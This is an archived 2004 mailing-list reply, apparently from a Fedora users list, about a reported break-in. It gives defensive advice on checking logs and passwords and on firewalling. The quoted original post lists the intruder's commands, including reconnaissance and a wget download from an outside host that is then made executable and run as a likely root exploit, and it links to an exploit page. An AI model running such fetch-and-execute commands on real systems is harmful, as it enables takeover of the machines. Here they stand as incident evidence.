<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 TRANSITIONAL//EN"> <HTML> <HEAD> <META HTTP-EQUIV="Content-Type" CONTENT="text/html; CHARSET=UTF-8"> <META NAME="GENERATOR" CONTENT="GtkHTML/3.3.2"> </HEAD> <BODY> And how does this prove that there is a vulnerability in fedora and not that you have poor securty? According to the URL's you post some one has installed a root kit. Unlucky. But they had to get it there first. You should first discover how they got onto your machine. You will need to check a lot more logs than just wtemp. Try secure and messages as well. Maybe some one guessed your password. I really hope that you have firewalled that ip range out to help prevent further trouble from that IP range ( assuming though the hacker isn't bouncing from comprimised machine to comprimised machine ). Also, you might want to consider who has had or might have had physical access to your machine ( if that is possible ). Pointing the finger at Fedora with out real proof is pointless. On Mon, 2004-11-22 at 02:14 +0000, richard mullens wrote: <BLOCKQUOTE TYPE=CITE> <PRE> Someone logged into my system on 13 Nov 2004 I found the following in /var/log/wtmp 207-36-180-20.prt.primarydns.com demo.allegientsystems.com My user password was changed - but not the root password - and the following commands had been executed:- w uname -a cat /etc/issue cd /tmp wget chebeleu.com/local chmod +x local ./local -d -r ./local -d -r lunx lynx There is a similar report dated 10-Nov-2004 at <A HREF="http://episteme.arstechnica.com/eve/ubb.x?a=tpc&s=50009562&f=96509133&m=531005547631">http://episteme.arstechnica.com/eve/ubb.x?a=tpc&s=50009562&f=96509133&m=531005547631</A> where someone suggested it might be the exploit at <A HREF="http://www.k-otik.com/exploits/12.05.hatorihanzo.c.php">http://www.k-otik.com/exploits/12.05.hatorihanzo.c.php</A> Anybody know any more ? </PRE> </BLOCKQUOTE> </BODY> </HTML>